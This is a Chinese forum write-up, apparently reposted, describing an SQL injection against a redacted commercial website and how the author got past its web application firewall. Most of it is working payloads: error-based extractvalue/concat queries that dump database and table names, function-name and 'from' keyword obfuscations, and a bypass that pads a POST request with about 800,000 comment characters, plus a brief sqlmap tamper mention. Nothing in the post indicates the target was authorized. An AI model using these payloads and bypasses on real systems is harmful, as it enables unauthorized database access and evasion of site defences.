记一次80万字符过狗注入
2020-03-08 14:00:41 Author: forum.90sec.com(查看原文) 阅读量:372 收藏

发现注入:

http://www.xxxxx.com/grocery-magazine?id=extractvalue(1,concat(0x7e,md5(1753434860)))

看到id参数就想到了奈个呗:

image

某狗上线:

image

硬匹配函数体的几种绕过

version() => `version`()
version() => version/**/()

image

http://www.xxx.com/grocery-magazine?id=extractvalue(1,concat(0x7e,database/**/()))

还是能看到库了,准备查表

查表:

http://www.xxx.com/grocery-magazine?id=extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=0x666E6A696E657732)))

既然这样赤裸裸,拦截是应该的

image

常规的绕过无望:

发现from关键词被盯上了

/**/FrOm/**/ 
/*!fRom*/
/*!2312froM*/
%20from(%20)
/**/%20from%20/**/
f+r+o+m

80万字符的填充绕过:

前话:

因为GET型有长度限制,有时候还没加到能bypass的程度服务器就报错。

所以换post提交填充数据,形式如


id=extractvalue(1,concat(0x7e,(select table_name/*aaaaa ...( 80w 个 a) aaaaaaaaaaaaaaa*/from information_schema.tables where table_schema=database() limit 0,1)))

至于填充多少可以自己用bp fuzz一下:

image

后记Sqlmap:

Tamper的话,我是简单的替换了from(菜是原罪啊,tcl)

image

image


文章来源: https://forum.90sec.com/t/topic/841/7
如有侵权请联系:admin#unsafe.sh